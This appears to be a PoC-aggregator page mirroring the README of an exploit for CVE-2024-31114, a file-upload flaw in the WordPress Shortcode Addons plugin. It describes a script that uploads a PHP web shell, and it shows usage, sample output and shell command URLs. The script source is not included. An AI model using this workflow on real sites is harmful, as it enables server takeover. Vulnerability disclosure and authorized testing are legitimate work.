CVE-2024-31114 PoC — WordPress Shortcode Addons <= 3.2.5 - Arbitrary File Upload vulnerability

Source

https://github.com/Nxploited/CVE-2024-31114

Associated Vulnerability

Title:WordPress Shortcode Addons <= 3.2.5 - Arbitrary File Upload vulnerability (CVE-2024-31114)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in biplob018 Shortcode Addons.This issue affects Shortcode Addons: from n/a through 3.2.5.

Description

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload

Readme

# CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

**Shortcode Addons <= 3.2.5 – Authenticated (Admin+) Arbitrary File Upload**  
**CVE ID:** CVE-2024-31114  
**CVSS Score:** 9.1 (Critical)  

---

## 🛠️ Vulnerability Description

The **Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension** plugin for WordPress is vulnerable to arbitrary file uploads due to **missing file type validation** in all versions **up to and including 3.2.5**.

This flaw allows **authenticated attackers with administrator-level access or higher** to upload arbitrary files to the server — which can lead to **Remote Code Execution (RCE).**

---

## 🚀 Script Description

This Python script automates exploitation of the vulnerability. It performs:

1. Disabling SSL verification
2. Logging in with given credentials
3. Extracting the CSRF token (`_wpnonce`)
4. Generating a PHP shell (`nxploit.php`)
5. Compressing and uploading it as a `.zip`
6. Confirming the upload and accessing the shell
7. Executing `whoami` on the target server

---

## 🧪 Usage

```bash
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password
```

---

## 📤 Example Output

```
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
```

---
## 🐚 Web Shell Usage

Once the payload is uploaded, you can execute system commands using the following format:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
```

🔹 Example:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
```

This will list the contents of the current directory on the server.


## ⚠️ Disclaimer

This tool is for **educational and authorized testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this script.

Use responsibly and only on systems you have explicit permission to test.

---
**By:** Nxploited | Khaled Alenazi

File Snapshot


 [4.0K]  /data/pocs/1c7573d2eaa001a3272ea1e5512608a44094aa45
├── [4.3K]  CVE-2024-31114.py
├── [1.1K]  LICENSE
└── [2.5K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!